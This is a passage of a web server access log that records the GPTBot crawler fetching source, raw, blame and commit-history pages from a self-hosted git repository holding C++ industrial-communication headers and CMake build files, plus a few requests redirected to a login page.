"https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/cpp/include/log_macros.hpp" +[17/Feb/2026:15:55:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/cpp/include/modbus_tcp.hpp" [Client 74.7.227.38] [Length 1524] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/cpp/include/modbus_tcp.hpp" +[17/Feb/2026:15:55:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/cpp/include/data_format.hpp" [Client 74.7.227.38] [Length 546] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/cpp/include/data_format.hpp" +[17/Feb/2026:15:55:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/cpp/include/app_init.hpp" [Client 74.7.227.38] [Length 10449] [Gzip 3.19] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/cpp/include/app_init.hpp" +[17/Feb/2026:15:55:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/CMakeFiles/3.31.10" [Client 74.7.227.38] [Length 10465] [Gzip 3.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/CMakeFiles" +[17/Feb/2026:15:55:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/CMakeFiles/3.31.10" [Client 74.7.227.38] [Length 10466] [Gzip 3.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/CMakeFiles" +[17/Feb/2026:15:55:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/CMakeFiles/3.31.10" [Client 74.7.227.38] [Length 10460] [Gzip 3.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/CMakeFiles" +[17/Feb/2026:15:55:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/cpp/include/modbus_tcp.hpp" [Client 74.7.227.38] [Length 13339] [Gzip 4.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/cpp/include" +[17/Feb/2026:15:55:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/cpp/include/data_format.hpp" [Client 74.7.227.38] [Length 546] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/cpp/include/data_format.hpp" +[17/Feb/2026:15:55:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/cpp/include/app_init.hpp" [Client 74.7.227.38] [Length 10448] [Gzip 3.19] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/cpp/include/app_init.hpp" +[17/Feb/2026:15:55:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/docker-compose.yml?display=rendered" [Client 74.7.227.38] [Length 10896] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/docker-compose.yml" +[17/Feb/2026:15:55:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldPilot" [Client 74.7.227.38] [Length 12287] [Gzip 3.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer" +[17/Feb/2026:15:55:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/lib64?display=source" [Client 74.7.227.38] [Length 11057] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/lib64" +[17/Feb/2026:15:55:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/lib64?display=rendered" [Client 74.7.227.38] [Length 10994] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/lib64" +[17/Feb/2026:15:56:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/projects.sln?display=rendered" [Client 74.7.227.38] [Length 10837] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/projects.sln" +[17/Feb/2026:15:56:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" [Client 74.7.227.38] [Length 15255] [Gzip 5.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/CMakeFiles/3.31.10" +[17/Feb/2026:15:56:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" [Client 74.7.227.38] [Length 11051] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/CMakeFiles/3.31.10" +[17/Feb/2026:15:56:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" [Client 74.7.227.38] [Length 15254] [Gzip 5.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/CMakeFiles/3.31.10" +[17/Feb/2026:15:56:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" [Client 74.7.227.38] [Length 15255] [Gzip 5.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/CMakeFiles/3.31.10" +[17/Feb/2026:15:56:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeSystem.cmake" [Client 74.7.227.38] [Length 11604] [Gzip 3.40] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/CMakeFiles/3.31.10" +[17/Feb/2026:15:56:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeSystem.cmake" [Client 74.7.227.38] [Length 11605] [Gzip 3.40] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/CMakeFiles/3.31.10" +[17/Feb/2026:15:56:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeSystem.cmake" [Client 74.7.227.38] [Length 11606] [Gzip 3.40] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/CMakeFiles/3.31.10" +[17/Feb/2026:15:56:04 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/GoldPilot" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot" +[17/Feb/2026:15:56:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4853] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/GoldPilot" +[17/Feb/2026:15:56:05 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_upload/main/GoldPilot" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot" +[17/Feb/2026:15:56:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4853] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_upload/main/GoldPilot" +[17/Feb/2026:15:56:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" [Client 74.7.227.38] [Length 11051] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/CMakeFiles/3.31.10" +[17/Feb/2026:15:56:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" [Client 74.7.227.38] [Length 11051] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/CMakeFiles/3.31.10" +[17/Feb/2026:15:56:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" [Client 74.7.227.38] [Length 15437] [Gzip 8.25] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" +[17/Feb/2026:15:56:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" [Client 74.7.227.38] [Length 12560] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" +[17/Feb/2026:15:56:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" [Client 74.7.227.38] [Length 6463] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" +[17/Feb/2026:15:56:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" [Client 74.7.227.38] [Length 15434] [Gzip 8.26] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" +[17/Feb/2026:15:56:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" [Client 74.7.227.38] [Length 15437] [Gzip 8.25] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" +[17/Feb/2026:15:56:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" [Client 74.7.227.38] [Length 21651] [Gzip 28.93] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" +[17/Feb/2026:15:56:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" [Client 74.7.227.38] [Length 9972] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" +[17/Feb/2026:15:56:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" [Client 74.7.227.38] [Length 9979] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" +[17/Feb/2026:15:56:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" [Client 74.7.227.38] [Length 9973] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" +[17/Feb/2026:15:56:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeSystem.cmake" [Client 74.7.227.38] [Length 9970] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeSystem.cmake" +[17/Feb/2026:15:56:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" [Client 74.7.227.38] [Length 6463] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" +[17/Feb/2026:15:56:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeSystem.cmake" [Client 74.7.227.38] [Length 9969] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeSystem.cmake" +[17/Feb/2026:15:56:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeSystem.cmake" [Client 74.7.227.38] [Length 9973] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeSystem.cmake" +[17/Feb/2026:15:56:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" [Client 74.7.227.38] [Length 6463] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" +[17/Feb/2026:15:56:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeSystem.cmake" [Client 74.7.227.38] [Length 10821] [Gzip 3.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeSystem.cmake" +[17/Feb/2026:15:56:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeSystem.cmake" [Client 74.7.227.38] [Length 10821] [Gzip 3.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeSystem.cmake" +[17/Feb/2026:15:56:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeSystem.cmake" [Client 74.7.227.38] [Length 10820] [Gzip 3.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeSystem.cmake" +[17/Feb/2026:15:56:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeSystem.cmake" [Client 74.7.227.38] [Length 422] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeSystem.cmake" +[17/Feb/2026:15:56:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeSystem.cmake" [Client 74.7.227.38] [Length 422] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeSystem.cmake" +[17/Feb/2026:15:56:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeSystem.cmake" [Client 74.7.227.38] [Length 422] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeSystem.cmake" +[17/Feb/2026:15:56:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" [Client 74.7.227.38] [Length 9985] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; 